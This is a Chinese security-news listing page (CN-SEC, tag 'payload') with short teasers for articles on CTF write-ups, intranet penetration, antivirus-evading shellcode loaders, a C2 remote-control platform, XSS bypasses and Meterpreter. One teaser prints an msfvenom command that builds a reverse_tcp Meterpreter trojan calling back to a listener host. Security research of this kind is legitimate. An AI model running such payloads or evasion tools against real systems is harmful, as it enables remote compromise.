payload - 第 71 | CN-SEC 中文网

CTF专场

2023 中华武术杯 Web Writeup

2023 中华武术杯 Web Writeup (AWDP + 靶场)AWDPAerocraftsfastjson 1.2.83 + redisauth 路由传入 password 的时候没有限制 CR...

10月20日49 views评论

阅读全文

安全文章

多层内网环境渗透测试

本次多层网络域渗透项目旨在模拟红队攻击人员在授权情况下对目标进行渗透，从外网打点到内网横向穿透，最终获得整个内网权限的过程，包含GPP漏洞利用，非约束委派和约束委派，CVE-2020-1472，SQL...

10月18日21 views评论

阅读全文

安全文章

实战-针对网贷诈骗网站渗透1

免费&进群本文由掌控安全学院 - xi4007 投稿开局一张图二.漏洞分析2.1 第一套源码漏洞分析2.1.1 Thinkphp日志泄漏基于Thinkphp3...

10月14日229 views评论

阅读全文

安全工具

免杀工具-Shellcode加载器

安全工具 01 工具介绍这个项目提供了一个工具，用于解密并加载shellcode。它支持RC4和AES两种解密方法，并使用DInvoke来动态调用WinAPI函数，从而尝试绕过某些安全解决方案。 D...

10月14日80 views评论

阅读全文

安全工具

shellcode解密并加载工具

=================================== 免责声明请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，...

10月14日71 views评论

阅读全文

安全工具

【红队利器】Supershell C2 远控平台

免责声明本公众号所发布的文章及工具代码等仅限交流学习，本公众号不承担任何责任！如有侵权，请告知我们立即删除。工具介绍 ❝ Supershell是一个通过WEB服务访问的C2远控平台，通过建立反向S...

10月14日69 views评论

阅读全文

安全文章

CVE-2023-27121漏洞分析：Pleasant Password Manager的XSS漏洞

更多全球网络安全资讯尽在邑安全漏洞概述在近期的一次安全模拟测试任务中，MDSec ActiveBreach红队研究人员需要对目标组织所采用的密码管理器解决方案的安全性进行审计和测试，其关键目标是入侵并...

10月12日27 views评论

阅读全文

安全文章

【BugBounty】记一次Xss绕过

前言最近一直在看国外的赏金平台，绕waf是真的难受, 记录一下绕过的场景。初步测试一开始尝试XSS，发现用户的输入在title中展示，那么一般来说就是看能否闭合，我们从下面图中可以看到，输入尖括...

10月12日28 views评论

阅读全文

安全闲碎

安卓 Android 终端接入阿里云 IoT 物联网平台

在全球智能手机市场里，谷歌开发的安卓(Android)移动操作系统市场占有率已经高达90%。随着物联网智能硬件升级，安卓(Android)也逐渐成为智能摄像头，智能对讲门禁，人脸识别闸机，智能电视，智...

10月07日36 views评论

阅读全文

安全文章

Xss Bypass dog

前言之前写过类型的水文，感觉写的一般。重新再苟了一遍。Fuzz简单粗暴的Fuzz，是我的首选，可以从Github，推特以及一些xss_payload分享网站，收集到足够的xss_payload进行Fu...

10月05日40 views评论

阅读全文

安全工具

TQL！新免杀生成Tools（附下载）

0x01 简介 Windows通用免杀shellcode加载器 language: English Windows平台的ShellcodeLoader能够免杀Microsoft Defender、36...

09月26日112 views评论

阅读全文

安全文章

Meterpreter源码分析

一、生成木马上线msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.245.129 LPORT=4444 > /home/rkabyss...

09月24日73 views评论

阅读全文